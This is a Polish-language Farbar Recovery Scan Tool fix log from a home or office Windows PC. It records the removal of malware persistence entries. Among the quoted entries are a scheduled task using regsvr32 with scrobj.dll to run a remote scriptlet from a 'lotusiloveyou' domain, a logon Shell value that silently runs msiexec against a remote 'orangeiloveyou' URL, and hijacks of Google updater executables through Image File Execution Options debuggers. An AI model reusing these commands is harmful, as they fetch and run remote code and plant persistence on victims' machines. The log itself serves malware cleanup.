Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 28-05-2017 Uruchomiony przez MAGDA (30-05-2017 07:55:33) Run:1 Uruchomiony z C:\Users\MAGDA\Downloads Załadowane profile: MAGDA (Dostępne profile: MAGDA & PRACOWNICY & Gość) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\ChromeHTML: -> <==== UWAGA Task: {0C1573E6-EB72-4A0D-B905-E6C7F9C00BF2} - System32\Tasks\{D3350727-1A18-45FF-9650-FE53F21D8DB2} => pcalua.exe -a C:\Users\MAGDA\AppData\Local\Temp\{18E20274-F8B2-4061-934E-E94E4F113858}\InstallFlashPlayer.exe -d C:\Users\MAGDA\AppData\Local\Temp\ICD1.tmp -c -iv 6 <==== UWAGA Task: {E1EE3ED7-C883-4490-878D-07DB4A475E93} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj1YFjk8RkIcFjE8MdF4RUNSRjI1FUNLFdE3MUFcFdYdRF== scrobj.dll C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk RemoveDirectory: C:\Program Files (x86)\Bangtony RemoveDirectory: C:\Users\MAGDA\AppData\Local\Bangtony RemoveDirectory: C:\Users\MAGDA\AppData\Roaming\Bangtony FirewallRules: [{E980C772-4A40-40FF-8818-542C65790C55}] => (Allow) C:\Program Files (x86)\Mail.Ru\Sputnik\SputnikHelper.exe FirewallRules: [{27FC16EC-FFB1-4520-9657-903708EE55B9}] => (Allow) C:\Program Files (x86)\Mail.Ru\Sputnik\SputnikHelper.exe FirewallRules: [{F76C0C47-6098-4C47-BFF2-D79F08D068BE}] => (Allow) C:\Program Files (x86)\Mail.Ru\Sputnik\SputnikFlashPlayer.exe FirewallRules: [{F5CB7DEC-6781-44FD-867F-C35B93477FAC}] => (Allow) C:\Program Files (x86)\Mail.Ru\Sputnik\SputnikFlashPlayer.exe FirewallRules: [{D5CF5E93-C38C-43BA-AAED-B6B1F3D663F0}] => (Allow) C:\Program Files (x86)\Bangtony\Application\chrome.exe FirewallRules: [{17AA0B84-A7C8-4140-B2BF-336ADA96EDEB}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{77E9E3FC-75B2-4FF6-A776-0532C8B8AC4F}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\MAGDA\AppData\Local\Firefox RemoveDirectory: C:\Users\MAGDA\AppData\Roaming\Firefox HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\Policies\system: [LogonHoursAction] 2 HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1 HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1YFjk8RkIcFjE8MdF4RUNSRjI1FUNLFdE3MUFcFdYdRF== /q IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe GroupPolicy\User: Ograniczenia <======= UWAGA GroupPolicyUsers\S-1-5-21-266744301-1538140241-1666147108-1003\User: Ograniczenia <======= UWAGA SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-266744301-1538140241-1666147108-1000 -> {E88E0043-C9D4-4e33-8555-FEE4F5B63060} URL = hxxp://go.mail.ru/search?q={searchTerms}&utf8in=1&fr=ietb BHO-x32: Brak nazwy -> {8984B388-A5BB-4DF7-B274-77B879E179DB} -> Brak pliku BHO-x32: Brak nazwy -> {b18906df-1dfa-4d50-8a1f-7d076a8c87b7} -> Brak pliku Toolbar: HKU\S-1-5-21-266744301-1538140241-1666147108-1000 -> Brak nazwy - {09900DE8-1DCA-443F-9243-26FF581438AF} - Brak pliku R2 DsSvc; C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0}\packages\Win81_SDK\9bcb3fab78e80d68be28892ea7ad46c3.msp:dp [210946 ] () [Brak podpisu cyfrowego] <==== UWAGA R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [93696 2017-05-26] () [Brak podpisu cyfrowego] <==== UWAGA S1 MpKsl609328ae; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{15547DD3-66D3-4FC6-A0C8-D0267EAC43CD}\MpKsl609328ae.sys [X] R2 WinCacheSrv; C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp [205826 ] () [Brak podpisu cyfrowego] <==== UWAGA C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0}\packages\Win81_SDK\9bcb3fab78e80d68be28892ea7ad46c3.msp:dp C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp 2017-05-29 07:14 - 2017-05-29 07:19 - 00000000 ____D C:\Program Files (x86)\BiaoJi C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Witryna Sage.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia Handel - Stacja robocza.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia - Dokumentacja\Aktywacja.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia - Dokumentacja\Elektroniczne zg�oszenie problemu.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia - Dokumentacja\Symfonia Handel - Stacja robocza.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia - Dokumentacja\Umowa licencyjna.lnk C:\Users\Go��\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk C:\Users\Go��\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Go��\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\MAGDA\AppData\Roaming\Microsoft\Word\aneks_pol%20levant305943631758176149\aneks_pol%20levant.doc.lnk C:\Users\MAGDA\AppData\Roaming\Microsoft\Excel\03%20kwiecie�%202017305869361454104687\03%20kwiecie�%202017.xls.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\MAGDA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\MAGDA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Program Files (x86)\Google C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome C:\Users\MAGDA\AppData\Local\Google DeleteKey: HKCU\Software\Google DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google EmptyTemp: ***************** Procesy zostały pomyślnie zamknięte. Punkt przywracania został pomyślnie utworzony. HKU\S-1-5-21-266744301-1538140241-1666147108-1000_Classes\ChromeHTML => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0C1573E6-EB72-4A0D-B905-E6C7F9C00BF2} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0C1573E6-EB72-4A0D-B905-E6C7F9C00BF2} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\{D3350727-1A18-45FF-9650-FE53F21D8DB2} => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{D3350727-1A18-45FF-9650-FE53F21D8DB2} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E1EE3ED7-C883-4490-878D-07DB4A475E93} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E1EE3ED7-C883-4490-878D-07DB4A475E93} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\PowerWord-SCT-JT => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => klucz pomyślnie usunięto C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => pomyślnie przeniesiono "C:\Program Files (x86)\Bangtony" => pomyślnie usunięto. "C:\Users\MAGDA\AppData\Local\Bangtony" => nie znaleziono. "C:\Users\MAGDA\AppData\Roaming\Bangtony" => nie znaleziono. HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{E980C772-4A40-40FF-8818-542C65790C55} => Wartość pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{27FC16EC-FFB1-4520-9657-903708EE55B9} => Wartość pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F76C0C47-6098-4C47-BFF2-D79F08D068BE} => Wartość pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F5CB7DEC-6781-44FD-867F-C35B93477FAC} => Wartość pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{D5CF5E93-C38C-43BA-AAED-B6B1F3D663F0} => Wartość pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{17AA0B84-A7C8-4140-B2BF-336ADA96EDEB} => Wartość pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{77E9E3FC-75B2-4FF6-A776-0532C8B8AC4F} => Wartość pomyślnie usunięto "C:\Program Files (x86)\Firefox" => pomyślnie usunięto. "C:\Users\MAGDA\AppData\Local\Firefox" => pomyślnie usunięto. "C:\Users\MAGDA\AppData\Roaming\Firefox" => pomyślnie usunięto. HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => Wartość pomyślnie usunięto HKU\S-1-5-21-266744301-1538140241-1666147108-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\\LogonHoursAction => Wartość pomyślnie usunięto HKU\S-1-5-21-266744301-1538140241-1666147108-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\\DontDisplayLogonHoursWarnings => Wartość pomyślnie usunięto HKU\S-1-5-21-266744301-1538140241-1666147108-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => Wartość pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdate.exe => klucz pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdaterService.exe => klucz pomyślnie usunięto C:\Windows\system32\GroupPolicy\User => pomyślnie przeniesiono C:\Windows\system32\GroupPolicy\GPT.ini => pomyślnie przeniesiono C:\Windows\system32\GroupPolicyUsers\S-1-5-21-266744301-1538140241-1666147108-1003\User => pomyślnie przeniesiono HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość pomyślnie usunięto HKU\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość pomyślnie usunięto HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość pomyślnie usunięto HKU\S-1-5-21-266744301-1538140241-1666147108-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{E88E0043-C9D4-4e33-8555-FEE4F5B63060} => klucz pomyślnie usunięto HKCR\CLSID\{E88E0043-C9D4-4e33-8555-FEE4F5B63060} => klucz nie znaleziono. HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8984B388-A5BB-4DF7-B274-77B879E179DB} => klucz pomyślnie usunięto HKCR\Wow6432Node\CLSID\{8984B388-A5BB-4DF7-B274-77B879E179DB} => klucz nie znaleziono. HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{b18906df-1dfa-4d50-8a1f-7d076a8c87b7} => klucz pomyślnie usunięto HKCR\Wow6432Node\CLSID\{b18906df-1dfa-4d50-8a1f-7d076a8c87b7} => klucz nie znaleziono. HKU\S-1-5-21-266744301-1538140241-1666147108-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{09900DE8-1DCA-443F-9243-26FF581438AF} => Wartość pomyślnie usunięto HKCR\CLSID\{09900DE8-1DCA-443F-9243-26FF581438AF} => klucz nie znaleziono. HKLM\System\CurrentControlSet\Services\DsSvc => klucz pomyślnie usunięto DsSvc => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\FirefoxU => klucz pomyślnie usunięto FirefoxU => serwis pomyślnie usunięto MpKsl609328ae => serwis nie znaleziono. HKLM\System\CurrentControlSet\Services\WinCacheSrv => klucz pomyślnie usunięto WinCacheSrv => serwis pomyślnie usunięto Nie można przenieść "C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0}\packages\Win81_SDK\9bcb3fab78e80d68be28892ea7ad46c3.msp:dp" => Zaplanowany do przeniesienia przy restarcie. Nie można przenieść "C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp" => Zaplanowany do przeniesienia przy restarcie. C:\Program Files (x86)\BiaoJi => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Witryna Sage.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia Handel - Stacja robocza.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia - Dokumentacja\Aktywacja.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia - Dokumentacja\Elektroniczne zgłoszenie problemu.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia - Dokumentacja\Symfonia Handel - Stacja robocza.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia - Dokumentacja\Umowa licencyjna.lnk => pomyślnie przeniesiono C:\Users\Gość\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\Gość\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\Gość\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\MAGDA\AppData\Roaming\Microsoft\Word\aneks_pol%20levant305943631758176149\aneks_pol%20levant.doc.lnk => pomyślnie przeniesiono C:\Users\MAGDA\AppData\Roaming\Microsoft\Excel\03%20kwiecień%202017305869361454104687\03%20kwiecień%202017.xls.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\Users\MAGDA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\Users\MAGDA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk => pomyślnie przeniesiono "C:\Users\Public\Desktop\Mozilla Firefox.lnk" => nie znaleziono. "C:\Program Files (x86)\Google" => nie znaleziono. "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome" => nie znaleziono. C:\Users\MAGDA\AppData\Local\Google => pomyślnie przeniesiono HKCU\Software\Google => klucz pomyślnie usunięto HKLM\SOFTWARE\Google => klucz nie znaleziono. HKLM\SOFTWARE\Wow6432Node\Google => klucz pomyślnie usunięto =========== EmptyTemp: ========== BITS transfer queue => 8388608 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 12457152 B Java, Flash, Steam htmlcache => 2637 B Windows/system/drivers => 287869814 B Edge => 0 B Chrome => 0 B Firefox => 18892179 B Opera => 0 B Temp, IE cache, history, cookies, recent: Users => 0 B Default => 0 B Public => 0 B ProgramData => 0 B systemprofile => 86276 B systemprofile32 => 68842 B LocalService => 564022082 B NetworkService => 13825367 B MAGDA => 2239237698 B PRACOWNICY => 7755897 B Gość => 9316196 B RecycleBin => 704627313 B EmptyTemp: => 3.6 GB danych tymczasowych Usunięto. ================================ Rezultat przenoszenia plików przy restarcie (Tryb startu: Normal) (Data i godzina: 30-05-2017 08:04:14) "C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0}\packages\Win81_SDK\9bcb3fab78e80d68be28892ea7ad46c3.msp:dp" => Nie można przenieść "C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp" => Nie można przenieść ==== Koniec Fixlog 08:04:14 ====